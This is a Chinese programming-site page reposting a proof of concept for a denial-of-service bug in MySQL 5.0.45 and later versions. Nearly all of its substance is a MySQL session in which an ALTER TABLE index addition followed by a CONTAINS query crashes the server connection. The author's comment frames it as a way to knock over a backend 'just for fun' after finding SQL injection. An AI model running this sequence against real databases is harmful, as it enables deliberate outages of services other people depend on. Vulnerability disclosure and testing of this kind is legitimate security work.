程序師世界是廣大編程愛好者互助、分享、學習的平台,程序師世界有你更精彩!
設為首頁 加入收藏
首頁
編程語言
C語言|JAVA編程
Python編程
網頁編程
ASP編程|PHP編程
JSP編程
數據庫知識
MYSQL數據庫|SqlServer數據庫
Oracle數據庫|DB2數據庫
 程式師世界 >> 數據庫知識 >> MYSQL數據庫 >> 關於MYSQL數據庫 >> mysql 5.0.45 (修改)拒絕服務漏洞

mysql 5.0.45 (修改)拒絕服務漏洞

編輯:關於MYSQL數據庫
mysql 5.0.45 (修改)拒絕服務漏洞
/*
* MySQL <=6.0 possibly affected
* Kristian Erik Hermansen
* Credit: Joe Gallo
* You must have Alter permissions to exploit this bug!
* Scenario: You found SQL injection, but you want to punch backend server
* in the nuts just for fun. Start with the Alter TABLE statement on
* a table and field you know to exist. The first two SQL statements are
* simply to demostrate reproducibility...
*/

<snip>
mysql> Create TABLE `test` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT PRIMARY KEY,
`foo` text NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
Query OK, 0 rows affected

mysql> Select * FROM test Where CONTAINS(foo, ''bar'');
Empty set

mysql> Alter TABLE test ADD INDEX (foo(100));
Query OK, 0 rows affected
Records: 0 Duplicates: 0 Warnings: 0

mysql> Select * FROM test Where CONTAINS(foo, ''bar'');
ERROR 2013 : Lost connection to MySQL server during query
</snip>
  1. 上一頁:
  2. 下一頁:
關於MYSQL數據庫
MySQL 相關的環境變量

使用MYSQL_PWD是不安全的。見6.3 與MySQL服務
MySQL ERROR 1045 (28000): Access denied for user root@localhost (using password: NO) 的原因分解決辦法

MySQL ERROR 1045 (28000): Acce
mysql 5.7.14 安裝配置方法圖文教程

因筆者個人需要需要在本機安裝Mysql,先將安裝過程記錄如下
Mysql入門系列:MySQL程序設計介紹

   在本書的這部分中,我們將討論編寫自己的訪問My
詳解MySQL性能優化(二)

接著上一篇學習:http://www.jb51.net/ar
完美轉換MySQL的字符集 解決查看utf8源文件中的亂碼問題

MySQL從4.1版本開始才提出字符集的概念,所以對於MyS
相關文章
閱讀排行榜
超詳細的mysql圖文安裝教程 數據備份系統解決方案 MySQL群集雙機模擬 在Jboss4.0下對MySql數據源的設置方法 調整table_cache 向MySQL數據庫增加新用戶權限的方法介紹 cmd中MySQL中文數據亂碼問題解決方法 mysql索引必須了解的幾個重要問題 防止mysql重復插入記錄的方法 Mysql入門系列:MYSQL服務器內部安全性-安全數據目錄訪問 MySQL中表分區技術詳細解析
熱門圖文
SQL查詢結果集對注入的影響及利用 Linux下安裝Sybase Sybase數據庫服務器端安裝 Sql server觸發器示例 oracle合並查詢 實例講解sql server排名函數DENSE_RANK的用法 Oracle開發之報表函數,oracle報表函數 MYSQL的MASTER到MASTER的主主循環同步
欄目導航
MYSQL入門知識SQL基礎知識關於MYSQL數據庫Mariadb數據庫MySQL綜合教程
Copyright © 程式師世界 All Rights Reserved